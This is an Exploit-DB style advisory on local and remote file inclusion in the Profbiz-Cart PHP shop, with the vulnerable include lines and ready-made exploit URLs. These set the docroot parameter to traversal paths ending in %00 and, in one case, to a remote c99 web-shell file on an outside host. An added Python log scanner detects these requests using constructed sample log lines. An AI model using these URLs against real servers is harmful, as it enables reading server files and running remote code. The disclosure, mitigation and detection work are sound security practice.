Vendor: Profbiz-Cart
By: Zer0 Thunder
CVSS: 8,8 (HIGH)
Local File Inclusion and Remote File Inclusion
CWE: 98
Product Name: Profbiz-Cart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP sp2
2009

Local File Inclusion and Remote File Inclusion Vulnerability in Profbiz-Cart

The Profbiz-Cart application is vulnerable to Local File Inclusion (LFI) and Remote File Inclusion (RFI). The vulnerable code is present in the dl-authcontent.php, dl-maincatsearch-dlcontent.php and dloads-payed.php files, each of which builds the path of a PHP include statement from the docroot variable; the advisory also lists dloads-header.php, where the same pattern results in RFI. An attacker can exploit this by sending a crafted HTTP request that sets the docroot parameter to a path or URL of their choosing. This allows the attacker to read sensitive files from the server or execute arbitrary code on the server.

Mitigation:

The application should be configured to only allow access to files that are necessary for the application to function. Additionally, the docroot input should be validated before it is used in an include path, so that it cannot point outside the application's own files or carry malicious code.

Exploit-DB raw data:

# Author: Zer0 Thunder
# Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/
# Tested on: Windows XP sp2 [WampServer 2.0i] 

- There are a couple of pages that have the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 $returlvar = "dloads";
    include "$docroot" . "tplates/usrauthlogin.php";
    exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Exploit :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]

Sample : 
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00

***************************************************************************************************

vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]

Sample
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00


Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]

Sample 
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00


************************************************************************

- For some reason this comes up with an RFI

Vuln c0de :	dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://server/store/dloads/dloads-header.php?docroot=[RFI]

Sample 
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00


########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################
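
Detection logic for the requests described in the advisory, added here as an example and not part of the original advisory or of Profbiz-Cart: it scans access-log lines for requests that pass docroot to the four named scripts and labels traversal sequences, encoded NUL bytes and URL schemes in the decoded value. The log lines, addresses and host.example are constructed, and treating any request-supplied docroot as reportable is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The four scripts named in the advisory that build an include path from $docroot.
SCRIPTS = {"dl-authcontent.php", "dl-maincatsearch-dlcontent.php",
           "dloads-payed.php", "dloads-header.php"}
# Request line inside a common/combined format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Return the reasons a decoded docroot value looks like an inclusion attempt."""
    reasons = []
    if re.search(r"(^|[\\/])\.{2,}([\\/]|$)", value):   # ../ or ..\ path segments
        reasons.append("traversal")
    if "\x00" in value:                                  # decoded %00 terminator
        reasons.append("null-byte")
    if re.match(r"[a-z][a-z0-9+.-]*://", value, re.I):   # http://, ftp://, php://, ...
        reasons.append("remote-url")
    return reasons


def scan(lines):
    """Return (script, reasons) for each request that passes docroot to a listed script.

    Assumption: docroot is meant to be set server-side, so any request that
    supplies it is reported, even when no specific pattern matches.
    """
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1]
        if script not in SCRIPTS:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("docroot", []):
            hits.append((script, classify(value) or ["docroot-in-request"]))
    return hits


# Constructed log lines; addresses and hosts are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /store/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /store/dloads/dloads-header.php?docroot=http://host.example/x.txt?%00 HTTP/1.1" 200 0',
    '192.0.2.45 - - [01/Jan/2010:10:00:12 +0000] "GET /store/dloads/dloadstplates/dloads-payed.php?docroot=/var/www/ HTTP/1.1" 200 90',
]
```

Calling `scan(SAMPLE_LOG)` returns one entry per flagged request; the same function can be fed lines read from a real access log.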